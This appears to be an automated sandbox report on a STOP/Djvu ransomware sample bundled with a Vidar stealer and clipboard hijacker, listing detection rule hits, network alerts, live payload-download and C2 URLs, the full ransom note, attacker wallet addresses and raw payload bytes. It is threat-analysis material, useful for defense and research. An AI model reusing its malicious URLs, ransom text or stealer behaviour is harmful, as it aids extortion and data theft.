5.0.U59WtZz2Sg.exe.400000.5.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
9.0.U59WtZz2Sg.exe.400000.8.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
9.0.U59WtZz2Sg.exe.400000.8.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.U59WtZz2Sg.exe.400000.8.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.U59WtZz2Sg.exe.400000.8.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.0.U59WtZz2Sg.exe.400000.5.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
17.0.U59WtZz2Sg.exe.400000.5.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.U59WtZz2Sg.exe.400000.5.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.U59WtZz2Sg.exe.400000.5.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
Click to see the 361 entries

Snort Signatures

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 222.236.49.123 - Destination IP: 192.168.2.5

Timestamp:	222.236.49.123192.168.2.580497042036335 11/30/22-00:22:18.131398
SID:	2036335
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.5 - Destination IP: 222.236.49.123

Timestamp:	192.168.2.5222.236.49.12349706802036333 11/30/22-00:22:26.085731
SID:	2036333
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.2.5 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.58.8.8.851441532023883 11/30/22-00:22:16.657289
SID:	2023883
Source Port:	51441
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.5 - Destination IP: 222.236.49.123

Timestamp:	192.168.2.5222.236.49.12349706802020826 11/30/22-00:22:26.085731
SID:	2020826
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.5 - Destination IP: 116.121.62.237

Timestamp:	192.168.2.5116.121.62.23749705802020826 11/30/22-00:22:17.137850
SID:	2020826
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.5 - Destination IP: 116.121.62.237

Timestamp:	192.168.2.5116.121.62.23749705802036333 11/30/22-00:22:17.137850
SID:	2036333
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://uaery.top/dl/build2.exeJ_	Avira URL Cloud: Label: malware
Source: http://fresherlights.com/files/1/build3.exerun	Avira URL Cloud: Label: malware
Source: http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=trueW	Avira URL Cloud: Label: malware
Source: http://fresherlights.com/files/1/build3.exe(	Avira URL Cloud: Label: malware
Source: http://uaery.top/dl/build2.exe	Avira URL Cloud: Label: malware
Source: http://uaery.top/dl/build2.exe$run	Avira URL Cloud: Label: malware
Source: http://fresherlights.com/test1/get.php	Avira URL Cloud: Label: malware
Source: http://fresherlights.com/files/1/build3.exe$run	Avira URL Cloud: Label: malware
Source: http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true	Avira URL Cloud: Label: malware
Source: http://uaery.top/dl/build2.exerunk6	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: U59WtZz2Sg.exe

Virustotal: Detection: 36%

Perma Link

Multi AV Scanner detection for domain / URL

Source: uaery.top	Virustotal: Detection: 21%			Perma Link
Source: fresherlights.com	Virustotal: Detection: 18%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build2[1].exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe	ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	ReversingLabs: Detection: 92%

Machine Learning detection for sample

Source: U59WtZz2Sg.exe

Joe Sandbox ML: detected

Source: 14.0.mstsca.exe.ee0000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 14.2.mstsca.exe.ee0000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 11.2.build3.exe.b90000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 11.0.build3.exe.b90000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://fresherlights.com/files/1/build3.exe"], "C2 url": "http://fresherlights.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-5UcwRdS3ED\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0609djfsieE", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local
Source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "https://t.me/asifrazatg", "Botnet": "517"}
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack	Malware Configuration Extractor: Clipboard Hijacker {"Crypto Addresses": ["DBbgRYaKG993LFJKCWz73PZqveWsnwRmGc", "3NLzE3tXwoagBrgFsjNNkPZfrESydTD8JP", "MBD2C8QV7RDrNtSDRe9B2iH5r7yH4iMcxk", "ltc1qa5lae8k7tzcw5lcjfvfs3n0nhf0z3cgrsz2dym", "addr1qx4jwm700r2w6fneakg0r5pkg76vu7qkt6qv7zxza3qu3w9tyahu77x5a5n8nmvs78grv3a5eeupvh5qeuyv9mzpezuq60zykl", "0xa6360e294DfCe4fE4Edf61b170c76770691aA111", "42UxohbdHGMYGPvW5Uep45Jt9Rj2WvTV958B5G5vHnawZhA4UwoD53Tafn6GRmcGdoSFUfCQN6Xm37LBZZ6qNBorFw3b6s2", "89SPVUAPHDLSq5pRdf8Eo6SLnKRJ8BNSYYnvPL6iJxGP4FBCBmkeV3CTSLCbk6uydxRnub4gLH6TBRycxSAQN2m1KcnhrSZ", "LLiNjWA9h4LxVtDigLQ79xQdGiJYC4oHis", "t1VQgJMcNsBHsDyu1tXmJZjDpgbm3ftmTGN", "bnb136ns6lfw4zs5hg4n85vdthaad7hq5m4gtkgf23", "Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPE", "1My2QNmVqkvN5M13xk8DWftjwC9G1F2w8Z", "bc1qx8vykfse9s9llguez9cuyjmy092yeqkesl2r5v"]}

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040E870
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040EAA0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	1_2_00410FC0

Source: U59WtZz2Sg.exe, 00000005.00000003.540487888.00000000031B4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: U59WtZz2Sg.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49712 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\gahu\juviru.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dismhost.pdbGCTL source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dismhost.pdb source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 9`C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb0h source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: U59WtZz2Sg.exe, 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: #C:\gahu\juviru.pdb0f source: U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 0_2_00403341 GetModuleHandleW,GetNamedPipeHandleStateW,InterlockedExchange,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedCompareExchange,GetConsoleTitleA,GetLogicalDriveStringsW,FlushFileBuffers,GetShortPathNameA,GetComputerNameExA,CopyFileW,CloseHandle,LoadLibraryA,InterlockedIncrement,InterlockedIncrement,GetCharWidthA,CreateNamedPipeW,WinHttpSetOption,GlobalFlags,FindFirstVolumeA,CreateJobObjectA,GetModuleHandleW,FindResourceA,GetHandleInformation,CancelTimerQueueTimer,VerifyVersionInfoA,InterlockedIncrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetCPInfoExW,GetBinaryTypeA,

0_2_00403341

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,		1_2_00410160
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,		1_2_0040F730

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.5:51441 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.5:49705 -> 116.121.62.237:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.5:49705 -> 116.121.62.237:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 222.236.49.123:80 -> 192.168.2.5:49704
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.5:49706 -> 222.236.49.123:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.5:49706 -> 222.236.49.123:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://fresherlights.com/test1/get.php
Source: Malware configuration extractor	URLs: https://t.me/asifrazatg

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /517 HTTP/1.1Host: 88.198.94.71
Source: global traffic	HTTP traffic detected: GET /176356074953.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----1417805488924803Host: 88.198.94.71Content-Length: 131097Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Nov 2022 23:22:17 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 29 Nov 2022 16:00:02 GMTETag: "40800-5ee9e14abb179"Accept-Ranges: bytesContent-Length: 264192Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 72 d7 f5 25 36 b6 9b 76 36 b6 9b 76 36 b6 9b 76 8b f9 0d 76 37 b6 9b 76 28 e4 0e 76 27 b6 9b 76 28 e4 18 76 5f b6 9b 76 11 70 e0 76 31 b6 9b 76 36 b6 9a 76 ae b6 9b 76 28 e4 1f 76 14 b6 9b 76 28 e4 0f 76 37 b6 9b 76 28 e4 0a 76 37 b6 9b 76 52 69 63 68 36 b6 9b 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d1 57 0d 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 01 00 00 48 06 00 00 00 00 00 97 4e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 07 00 00 04 00 00 4b 2c 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 0c 01 00 50 00 00 00 00 30 07 00 90 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 09 01 00 00 10 00 00 00 0a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 08 01 06 00 00 20 01 00 00 ca 02 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 2f 00 00 00 30 07 00 00 30 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
